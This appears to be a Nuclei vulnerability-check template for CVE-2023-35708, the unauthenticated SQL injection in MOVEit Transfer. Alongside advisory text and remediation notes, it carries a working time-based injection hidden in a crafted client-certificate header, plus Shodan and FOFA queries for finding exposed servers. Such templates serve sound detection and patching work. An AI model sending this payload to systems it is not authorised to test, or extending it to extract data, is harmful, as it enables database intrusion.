In Progress MOVEit Transfer before 2021.0.8 (13.0.8), 2021.1.6 (13.1.6), 2022.0.6 (14.0.6), 2022.1.7 (14.1.7), and 2023.0.3 (15.0.3), a SQL injection vulnerability has been identified in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain unauthorized access to MOVEit Transfer's database. An attacker could submit a crafted payload to a MOVEit Transfer application endpoint that could result in modification and disclosure of MOVEit database content. These are fixed versions of the DLL drop-in: 2020.1.10 (12.1.10), 2021.0.8 (13.0.8), 2021.1.6 (13.1.6), 2022.0.6 (14.0.6), 2022.1.7 (14.1.7), and 2023.0.3 (15.0.3).
PoC代码[已公开]
id: CVE-2023-35708
info:
name: MOVEit Transfer - SQL Injection
author: daffainfo,jjcho
severity: critical
description: |
In Progress MOVEit Transfer before 2021.0.8 (13.0.8), 2021.1.6 (13.1.6), 2022.0.6 (14.0.6), 2022.1.7 (14.1.7), and 2023.0.3 (15.0.3), a SQL injection vulnerability has been identified in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain unauthorized access to MOVEit Transfer's database. An attacker could submit a crafted payload to a MOVEit Transfer application endpoint that could result in modification and disclosure of MOVEit database content. These are fixed versions of the DLL drop-in: 2020.1.10 (12.1.10), 2021.0.8 (13.0.8), 2021.1.6 (13.1.6), 2022.0.6 (14.0.6), 2022.1.7 (14.1.7), and 2023.0.3 (15.0.3).
impact: |
Attackers can modify and disclose sensitive database content, leading to data breach and potential system compromise.
remediation: |
Update to fixed versions: 2020.1.10, 2021.0.8, 2021.1.6, 2022.0.6, 2022.1.7, or latest available version.
reference:
- https://x.com/wvuuuuuuuuuuuuu/status/1679969146635710469
- https://community.progress.com/s/article/MOVEit-Transfer-Critical-Vulnerability-15June2023
- https://www.progress.com/security/moveit-transfer-and-moveit-cloud-vulnerability
- https://nvd.nist.gov/vuln/detail/CVE-2023-35708
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.1
cve-id: CVE-2023-35708
cwe-id: CWE-89
epss-score: 0.28841
epss-percentile: 0.96427
cpe: cpe:2.3:a:progress:moveit_transfer:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: progress
product: moveit_transfer
shodan-query: http.favicon.hash:989289239
fofa-query: icon_hash=989289239
tags: cve,cve2023,moveit,sqli,progress,vkev,vuln
http:
- raw:
- |
@timeout: 20s
GET /machine.aspx HTTP/1.1
Host: {{Hostname}}
X-IPSGW-ClientCert: MIIDHzCCAgegAwIBAgIUL1Wu3MEgQSoE0t0TOHgicFEMPXgwDQYJKoZIhvcNAQELBQAwHzEdMBsGA1UEAwwUJztTRUxFQ1QgU0xFRVAoNik7LS0wHhcNMjYwMTIzMDEwNzMyWhcNMjYwMjIyMDEwNzMyWjAfMR0wGwYDVQQDDBQnO1NFTEVDVCBTTEVFUCg2KTstLTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAKJwqBj5z2idKyd5Z6SejFmAEiL+HjMITz598Jf8PhA3Xp32VQC+CS65Y8sf9X8S60kI457pusx28onM7txaQJu1Ln/DWtmWA1Hjfzo8/tCM6cZ8V22xI2dmHb2H28gBczx0lcr4LwrNZcO2rg+vq//BZwUes+QTkRUIIWZvFfxaZ+s5WbbmUhhzxJ2YeUvrYv6HuVkeHl9/v3ywQfGUHmBuzw+IGq7H+pRNdwYrJTWPT+Tb9XchhT87nn/eUxVAN9e5pkHLB+1qku/iWvdJKdvuo6x+srucZzW179Uoj9JIpzuG99PCWG8n6gMQhU0Qq2c6Jq2eUfyC9Y/Q7onDCPsCAwEAAaNTMFEwHQYDVR0OBBYEFP6gtIaFKgU2Bd3E++r1baKWETy7MB8GA1UdIwQYMBaAFP6gtIaFKgU2Bd3E++r1baKWETy7MA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQELBQADggEBAEzzUrpQlqeA17/glAVDdidkpNcBjOXv0JaoC/zirK3ByN63SC115nIPlRh0oksjCdO2HRJwdaZr0u7XYlxtH07DHqycZPX7gLWW5SWRRcf0kgvpXMgPQMkxSp+gQwaietSou8lJWkKPZtNJUVU/YZWsSY4iBZ5UbWO07UEV8VPcs6Ym8it1rW0lXg8Iy/u0UV/nFDeD8q4HUXk74DpFNkhMeDGVClb36iWxPvRFKpj3zR11huVWG/s0CeiuekTXxxicKPssJhBROGKAukiuYDGmLS95vILIbbh6cNfcZLzcTq3QW6YpLIR2UuXKwVwCEqHuEnLJw43TkZwqoxQ2vuY=
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'duration>=6'
- type: word
part: body
words:
- '<siLockResponse>'
- '<ErrorCode>'
condition: and
- type: status
status:
- 200
# digest: 490a0046304402202560b0791f117a703e315a6583e08f8e0389f6173f11113628882c8c9d46fa0202204a92537f79a6460deca297be5db6636b9272a4c67f1bab457240cf7f6007f9a7:922c64590222798bb761d5b6d8e72950